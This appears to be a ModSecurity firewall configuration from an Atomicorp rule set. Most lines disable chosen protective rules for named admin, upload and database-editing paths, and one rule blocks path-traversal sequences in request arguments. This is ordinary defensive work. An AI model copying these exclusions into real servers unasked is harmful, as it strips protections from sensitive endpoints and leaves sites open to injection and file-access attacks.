SecRule REQUEST_FILENAME "/main/php/editor\.php" "phase:2,id:92285,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340128"

SecRule REQUEST_FILENAME "/scp/canned\.php" "phase:2,id:92286,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/scp/tickets\.php" "phase:2,id:92287,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/scp/settings\.php" "phase:2,id:92288,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/didwegetthiswrong\.php" "phase:2,id:92289,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/acp/config_payments_form\.php" "phase:2,id:92290,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/v2/edit\.php" "phase:2,id:92291,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/b/ss/appleusstartpage/" "phase:2,id:92292,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/script-youtube-bg\.php" "phase:2,id:92293,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/adm_vsz/servert_up\.php" "phase:2,id:92294,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/smb/web/web-server-settings/" "phase:2,id:92295,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"

SecRule REQUEST_FILENAME "/smb/web/edit/" "phase:2,id:92296,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"

SecRule REQUEST_FILENAME "/ajaxupload\.php" "phase:2,id:92297,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/ajaxupload2\.php" "phase:2,id:92298,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/searchreplacedb2\.php" "phase:2,id:92299,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/static/ajax\.php" "phase:2,id:92300,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/js/tiny_mce/plugins/filemanager/upload\.php" "phase:2,id:92301,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=347008"
SecAction "phase:2,id:92302,t:none,pass,nolog,skipAfter:END_RULES_92302"


# Rule 340006: generic recursion signatures
SecRule ARGS "\.\./\.\./"  	"chain,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:cmdline,capture,id:344596,phase:2,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied in URI/ARGS',logdata:'%{TX.0},%{matched_var_name}'"
SecRule ARGS:path|ARGS:path_thumb "!(^\.\./\.\./\.\./\.\./\.\./media-upload/)"


SecMarker END_RULES_92302

SecRule REQUEST_FILENAME "/tools/payment_methods\.php" "phase:2,id:92303,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/sitesetup\.php" "phase:2,id:92304,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/addmodifybloguim\.php" "phase:2,id:92305,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/addeditartikel\.php" "phase:2,id:92306,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/load1pdf\.php" "phase:2,id:92307,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/_cmsms/admin/moduleinterface\.php" "phase:2,id:92308,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/manage/ci_car_f\.php" "phase:2,id:92309,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/saveedititem\.php" "phase:2,id:92310,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/moduleinterface\.php" "phase:2,id:92311,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/livesupport/server\.php" "phase:2,id:92312,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/scripts/process_submission\.php" "phase:2,id:92313,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095"

SecRule REQUEST_FILENAME "/admin/package_add_result\.php" "phase:2,id:92314,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/ee-admin\.php" "phase:2,id:92315,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/fulladmin/configproducts\.php" "phase:2,id:92316,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/product_options\.json\.php" "phase:2,id:92317,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/supportannouncements\.php" "phase:2,id:92318,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340095"

SecRule REQUEST_FILENAME "/fixtures_update\.php" "phase:2,id:92319,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/forums/private\.php" "phase:2,id:92320,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/vba_gallery_admin\.php" "phase:2,id:92321,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"

SecRule REQUEST_FILENAME "/multitv\.connector\.php" "phase:2,id:92322,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/e_editwrite\.php" "phase:2,id:92323,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095"

SecRule REQUEST_FILENAME "/e_date\.php" "phase:2,id:92324,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340095"

SecRule REQUEST_FILENAME "/dnsmanagement\.php" "phase:2,id:92325,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/clientarea\.php" "phase:2,id:92326,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/thumbnails\.php" "phase:2,id:92327,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/admin/stats\.php" "phase:2,id:92328,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095"

SecRule REQUEST_FILENAME "/agreement_edit\.php" "phase:2,id:92329,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095"

SecRule REQUEST_FILENAME "/process/processdb\.php" "phase:2,id:92330,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/mdeploy\.php" "phase:2,id:92331,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/themify/img\.php" "phase:2,id:92332,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/worldpay\.php" "phase:2,id:92333,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/parsechecker\.php" "phase:2,id:92334,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095"

SecRule REQUEST_FILENAME "/db_edit\.php" "phase:2,id:92335,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/admin/content\.php" "phase:2,id:92336,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/xoops/configproducts\.php" "phase:2,id:92337,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/engine/index\.php" "phase:2,id:92338,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/derefer\.php" "phase:2,id:92339,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/admin/change_it\.php" "phase:2,id:92340,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/secure/moveissue\.jspa" "phase:2,id:92341,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/configaddonmods\.php" "phase:2,id:92342,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/edit_menu\.php" "phase:2,id:92343,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/s/process\.php" "phase:2,id:92344,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/flash/gate\.php" "phase:2,id:92345,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=392301"

SecRule REQUEST_FILENAME "/multimediasave\.do" "phase:2,id:92346,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin/restaurant\.php" "phase:2,id:92347,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/wp-admin/plugins\.php" "phase:2,id:92348,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/admin/item\.php" "phase:2,id:92349,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/components/com_avchat3/chat/wget\.php" "phase:2,id:92350,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/securimage_play\.swf" "phase:2,id:92351,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007"

SecRule REQUEST_FILENAME "/frontpageupdate\.php" "phase:2,id:92352,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/parsechecker\.php" "phase:2,id:92353,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/document_general\.php" "phase:2,id:92354,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/lib/exe/ajax\.php" "phase:2,id:92355,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/quickview\.aspx" "phase:2,id:92356,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390613,ctl:ruleRemovebyID=390614"

SecRule REQUEST_FILENAME "/tce_file\.php" "phase:2,id:92357,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711,ctl:ruleRemovebyID=340095"

SecRule REQUEST_FILENAME "/admin/updatepage\.php" "phase:2,id:92358,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/modules/widget_engine\.php" "phase:2,id:92359,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/v2_news_engine\.php" "phase:2,id:92360,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095"

SecRule REQUEST_FILENAME "/db_routines\.php" "phase:2,id:92361,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"

SecRule REQUEST_FILENAME "/cmd/pagina\.php" "phase:2,id:92362,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/advcp/" "phase:2,id:92363,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/0101_change_text\.php" "phase:2,id:92364,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340006"

SecRule REQUEST_FILENAME "/0104_dupicate\.php" "phase:2,id:92365,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340006"

SecRule REQUEST_FILENAME "/0101_change_text\.php" "phase:2,id:92366,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340006"

SecRule REQUEST_FILENAME "/0104_duplicate\.php" "phase:2,id:92367,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340006"

SecRule REQUEST_FILENAME "/0101_change\.php" "phase:2,id:92368,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340006"

SecRule REQUEST_FILENAME "/0101_change_news\.php" "phase:2,id:92369,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340006"

SecRule REQUEST_FILENAME "/reviews/uploadproduct\.php" "phase:2,id:92370,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/redaxo/index\.php" "phase:2,id:92371,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/adm-misc\.php" "phase:2,id:92372,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/property-details\.php" "phase:2,id:92373,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/artikel/" "phase:2,id:92374,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

